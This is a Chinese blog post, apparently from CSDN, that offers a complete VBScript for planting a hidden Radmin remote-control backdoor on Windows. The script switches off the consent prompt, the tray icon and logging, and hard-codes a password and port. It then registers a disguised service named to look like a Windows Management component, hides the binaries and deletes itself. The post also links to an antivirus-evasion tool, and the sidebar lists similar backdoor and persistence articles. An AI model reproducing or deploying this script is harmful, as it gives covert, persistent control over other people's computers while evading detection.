[黑客必备] Vbs脚本实现radmin终极后门 [工具打包]

最新推荐文章于 2019-06-03 19:35:00 发布
最新推荐文章于 2019-06-03 19:35:00 发布
阅读量784 收藏 3
点赞数
文章标签: 操作系统 php shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_8333/article/details/82267107
版权
[黑客必备] Vbs脚本实现radmin终极后门 [工具打包]
2012年01月16日
  在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
  on error resume next
  const HKEY_LOCAL_MACHINE = &H80000002
  strComputer = "."
  Set StdOut = WScript.StdOut
  Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
  strComputer & "\root\default:StdRegProv")
  strKeyPath = "SYSTEM\RAdmin"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
  oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")
  strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
  uBinary = Array(1,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
  uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
  uBinary = Array(5,4,0,0) //端口:1029
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
  uBinary = Array(10,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
  Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
  strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
  strValueName = "LogFilePath"
  strValue = "c:\logfile.txt"
  set wshshell=createobject ("wscript.shell")
  a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)
  oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
  strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
  strValueName = "Description"
  strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
  oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  strValueName = "DisplayName"
  strValue = "Windows Management Instrumentation Player Drivers"
  oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  strValueName = "ImagePath"
  strValue = "c:\windows\system32\Exporer.exe /service"
  oreg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  set wshshell=createobject ("wscript.shell")
  a=wshshell.run ("net start WinManageHelp",0)
  b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)
  c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0)
  d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删
  免杀工具下载地址:http://bbs.163day.net/read.php?tid-498.html
iteye_8333
关注
vbs nc 后门程序
11-30
vbs横行的日子里我不在,在vbs不横行的时候 我小玩一下
Vbs脚本实现radmin终极后门代码_删除自身
09-06
描述部分提到的“终极后门代码_删除自身”指的是作者编写了一个VBS脚本,该脚本用于在Windows系统中植入radmin后门。而且该脚本具有自我删除的功能,以避免被安全软件检测到。这说明作者希望该脚本能够在不被发现的...
利用Vbs脚本实现radmin终极后门
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-05 739
导读:   在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。   on error resume next   const HKEY_LOCAL_MACHINE = &H80000002   strComputer = "."   Set StdOut = WScript.StdOut   Set oReg=
用nc+简单bat/vbs脚本+winrar制作迷你远控后门
weixin_30633949的博客
06-03 541
前言   某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念。   我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接。   真正的远控还没实践过,所以决定写个小后门试一试。 1.NC、正向Shell、反向Shell介绍 1.1 什么是nc:   nc是netcat的简写,就是一个简单、可靠的网络工具。当然因为某些奇怪原因,已经被各大杀毒轮番轰炸。...
利用adsutil.vbs+../+cmd.asp打造完美后门(alpha)
FreeXploiT
12-29 1583
本文作者:alpha文章出处:未知文章性质:原创阅读次数:25发布时间:2004-12-27一直以来我们为做一个好的后门而郁闷着,那些现成的后门软件都很难逃脱杀毒软件的追杀,而自己写后门对我们这些小虫虫来是又似乎不太现实。下面我将教你一个方法,让你打造只属于你自己的后门! 所须工具: 一个cmd.asp足够了哟,自己写一个或者是找一个都行,不过建议自己写一个其实很简单的哟!而且
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
einlb60q
01-16 151
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集 2010年12月07日   xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本   vbson error resume next   const HKEY_LOCAL_MACHINE = &H80000002   strComputer = "."   Se...
vbs 获取radmin注册表中的信息
09-06
在本文中,我们将详细探讨如何使用VBScript(简称vbs)来读取Radmin远程控制软件在Windows系统注册表中的相关信息。Radmin是一款广泛使用的远程控制工具,它允许用户通过网络远程访问和控制计算机。注册表是Windows...
Radmin Viewer密码记录工具
10-21
Radmin Viewer密码记录工具,简单易用,Alt+F4:记录密码、Alt+F1:快速输入密码
radmin 远程连接工具
03-31
远程连接工具,支持很多和连接的IP 远程连接工具,支持很多和连接的IP
Radmin免录用户密码工具
02-28
总的来说,"Radmin免录用户密码工具"是一个方便Radmin用户快速登录的辅助程序,但其使用需谨慎,应确保遵循合法和安全的原则。在享受便利的同时,不能忽视网络安全和个人隐私保护的重要性。在企业环境中,应遵循公司...
Radmin 远控精灵 v3.2 免费版(外置配置封装版)
10-10
Radmin 远控精灵 v3.2 免费版(外置配置封装版)Radmin 远控精灵 v3.2 免费版(外置配置封装版)Radmin 远控精灵 v3.2 免费版(外置配置封装版)
Radmin自动输密码软件简体中文免费版
08-04
二次封装的应用,可方便经常进行远程处理,免除经常输入用户名及密码。
Shift后门加密加强(共享版)
08-20
Shift后门加密加强(共享版)<br>1.编辑批处理 更改shiftdoor.exe绝对路径.<br>2.运行批处理即可.<br>3.后门密码为:ying
Radmin 远程控制客户端自动连接“注入配置小汤版”
09-09
继“毒药大师 (他的博客:http://www.poison.net.cn)” 开发的“Radmin自动连接器”进行功能完善: 1、圆点密码框动态加密,进一步安全防范; 2、随即隐藏密码输入窗口,进一步安全防范; 3、增加托盘菜单,最小化至托盘,使用更方便; 4、增设快捷键:Ctrl+- 隐藏窗口,Ctrl+= 显示窗口; 5、增加导入配置、导出配置、清空配置功能; 6、增加启动密码验证,防无聊人使用; 7、内置配置文件,并支持回写(退出程序即保存配置); 8、字符串加密、解密UDF——完美支持中文密码。 ================================================================ 修改:小汤 QQ: 348137508 版权归原作者所有! 这工具挺适合网络管理人员用,比如网吧、企业、计算机管理人员!
后门程序RAD.EXE
weixin_33832340的博客
06-05 225
制作RAD.EXE过程:   1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;   2、在本地设置服务端(一定要生成);   设置密码-->>设置连接端口(默认4489)-->>生成   3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg; ...
Radmin入侵
超哥的专栏
04-17 6725
Radmin (Remote Administrator)是一款屡获殊荣的远程控制软件,它将远程控制、外包服务组件、以及网络监控结合到一个系统里,提供目前为止最快速、强健而安全的工具包 生成被控端 点击“生成被控端”,生成被控端安装包,将要安装到被控端机器。密码和端口需要自己指定 生成“clear”和“server”安装包 生成控制端 点击“释放控制端”,生成控制端软件 生...
黑客】利用VBS脚本让QQ永远在线,等级速升
emzt82emzt
01-16 355
黑客】利用VBS脚本让QQ永远在线,等级速升 2010年08月15日   [b][/b] 下面的教程,教大家即使自己的QQ被别人强制关闭,仍然可以自动登陆上线。有了这个代码,可以让你的[b]QQ永远在线[/b]了。   1.qq自动登录脚本代码:   本部分设定了隐藏,您已回复过了,以下是隐藏的内容[b]   复制代码 set fso = Wscript.createOb...
Radmin密码破解的新招
|独自望海。。。
09-16 9214
Radmin 是一款很不错的服务器管理无论是 远程桌面控制 还是 文件传输速度都很快 很方便这样也形成了 很多服务器都装了 radmin这样的现在你说 4899默认端口 没密码的 服务器你上哪找?大家都知道radmin的密码都是32位md5hack.77169.com/List/List_46.html" target="_blank">加密后存放在注册表里的具体的表键值为 那在攻陷一台w
常见的几种Windows后门持久化方式
qq284489030的博客
05-09 2114
0×0 背景 持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用。 0×1 注册表自启动 最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动,此类操作一些较为敏感容易被本地AV...
Radmin远程控制工具3.4和3.5版本深度解析
- "远程控制工具radmin34.rar" 文件可能包含了 Radmin 3.4 版本的安装包及相关工具。 - "radmin*.*.*.*支持win10.rar" 文件包含了针对 Windows 10 的 Radmin 3.5 版本的安装文件。 5. 兼容性与更新: - Radmin 3.4 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值